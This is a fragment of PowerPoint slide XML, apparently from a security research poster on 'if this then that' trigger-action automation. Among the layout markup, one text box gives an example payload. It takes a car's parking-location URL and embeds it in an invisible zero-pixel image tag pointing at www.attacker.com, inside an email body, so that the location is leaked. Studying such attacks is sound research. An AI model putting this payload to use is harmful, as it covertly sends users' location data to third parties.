          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20678240" y="13330523"/>
            <a:ext cx="0" cy="923362"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="triangle"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="373" name="Picture 372">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{045BE550-A6F5-4045-8D3F-7316DEB1AF25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20145999" y="14401083"/>
            <a:ext cx="938992" cy="1143720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="TextBox 373">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F8A565-07A1-424E-A156-8CE5A35A2503}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16937365" y="14011889"/>
            <a:ext cx="2902987" cy="981766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="0C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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invisible image linking to attacker’s server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Rectangle 374">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6507DD04-B3F3-4201-96B1-A5080A983E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17121443" y="11941472"/>
            <a:ext cx="4699684" cy="338041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trigger API: Bmwlabs.startParking.ParkLocationURL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Rectangle 375">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEDF5621-AAF6-4756-AC48-1005B30D5796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19585798" y="13328225"/>
            <a:ext cx="4195482" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>                			Action API:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>                     Email.sendMeEmail.setBody(…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="377" name="Picture 376" descr="A close up of a sign&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56EC35B0-EB73-4C27-B5AE-97A6037F1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2658" y="12426470"/>
            <a:ext cx="865440" cy="865440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Rectangle 378">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8F135D-EDA1-41B2-B2FF-5F002E1BD8E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16612625" y="15741737"/>
            <a:ext cx="8014446" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Loc= encodeURIComponent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(Bmwlabs.startParking.ParkLocationUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Email.sendMeEmail.setBody(…+’&lt;img src=\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>www.attacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>?’+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>loc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinkfile">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>+’\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”style=\”width:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0px</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>;height:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0px</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aparajita" panose="020B0502040204020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>;\”&gt;’)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="383" name="Picture 382">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03C8C869-02A3-433A-847D-6A597B0E02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538861" y="12670972"/>
            <a:ext cx="623886" cy="623886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Picture 384">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DA67E89-C4C8-4202-AD00-6387E6E731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25554" y="12444145"/>
            <a:ext cx="297808" cy="400998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Right Bracket 399">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA439CA-8B08-4CE1-B679-781F0DC1AAB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="17614110" y="11751193"/>
            <a:ext cx="209263" cy="1299879"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0C23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2" name="Right Bracket 401">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{944F6435-2D5B-4494-AC09-B3DE6211446E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="21906412" y="12710161"/>
            <a:ext cx="47898" cy="1232259"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0C23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03" name="Picture 402">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E07DE4-3F9C-488D-9F31-82C02015E2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40057" y="12158044"/>
            <a:ext cx="297808" cy="400998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="406" name="Picture 405">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD112A7-40A1-4AF0-BEF1-BFB71A58654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13974" y="12531996"/>
            <a:ext cx="765542" cy="765542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="409" name="Picture 408" descr="A close up of graphics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52B8685A-0A71-4881-B7CB-3EF5C7CE45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87737" y="3721394"/>
            <a:ext cx="1226289" cy="1226289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="410" name="Picture 409" descr="A close up of graphics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACF5A762-B6F7-40C0-8D98-0C96CC3AFE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6677" y="10483700"/>
            <a:ext cx="1059713" cy="1059713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="411" name="Picture 410" descr="A close up of graphics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21651586-ACD6-44A2-90CD-CEBA9420F04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6313" y="12440089"/>
            <a:ext cx="1102245" cy="1102245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="412" name="Picture 411" descr="A close up of graphics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3542A044-3386-481D-983F-E5E7B3ACFE1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38389" y="9190073"/>
            <a:ext cx="1226289" cy="1226289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="413" name="Picture 412" descr="A close up of graphics&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B13A147-42C2-495E-9F22-9790E27540E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312575" y="3125972"/>
            <a:ext cx="1169581" cy="1169581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="417" name="Picture 416">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE725133-F153-4D20-A5D7-9A70478AD8B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26588" y="3827720"/>
            <a:ext cx="779719" cy="779719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="418" name="Picture 417">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D686A5-93CE-4B9B-BF20-F13A42BF697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16551" y="10614836"/>
            <a:ext cx="779719" cy="779719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="419" name="Picture 418">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B0DCD3-4934-48C8-9F67-3AB202CF52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83221" y="12553506"/>
            <a:ext cx="779719" cy="779719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="420" name="Picture 419">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58DD324-BBF3-4426-9688-DD70E6AB24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75714" y="9622464"/>
            <a:ext cx="779719" cy="779719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="421" name="Picture 420">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B62F0FF-2A29-4077-9014-44F6DA1BB72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663760" y="4905153"/>
            <a:ext cx="779719" cy="779719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="423" name="Picture 422">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEC7384F-E52E-41F1-A64F-BA42959193F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737003" y="3098799"/>
            <a:ext cx="863397" cy="863397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="426" name="Picture 425">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A39E3540-9842-42C7-BDCF-B5C69E620EC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381403" y="4038599"/>
            <a:ext cx="863397" cy="863397"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="TextBox 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07822F4-C7D4-4735-9A62-5CB418D11489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332510" y="5237017"/>
            <a:ext cx="7619999" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t"/>
          </a:scene3d>
          <a:sp3d>
            <a:bevelT prst="angle"/>
            <a:bevelB w="139700" h="139700" prst="divot"/>
          </a:sp3d>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if      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 	then    			 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Right Bracket 434">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF5D4297-6287-482D-9D02-05A32F400365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5116087" y="4118556"/>
            <a:ext cx="269576" cy="2189020"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0C23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6" name="Right Bracket 435">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93355F40-D8C3-4417-B2B3-3986D2FE6F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2073784" y="5262785"/>
            <a:ext cx="421975" cy="1798637"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0C23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7" name="Right Bracket 436">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847492B2-232B-427F-A1F4-972C3F2E9919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6314502" y="5067594"/>
            <a:ext cx="380410" cy="2230584"/>
          </a:xfrm>
          <a:prstGeom prst="rightBracket">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0C23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9" name="TextBox 438">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B15E8A9-032C-4D92-AA23-FDC048832925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669882" y="5896334"/>
            <a:ext cx="1425387" cy="477054"/>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trigger</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="TextBox 439">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E906E5DC-F1BA-4103-8ED8-E8B89B7D3002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5877589" y="5931375"/>
            <a:ext cx="1407459" cy="477054"/>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action</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="442" name="Picture 441">
            <a:extLst>
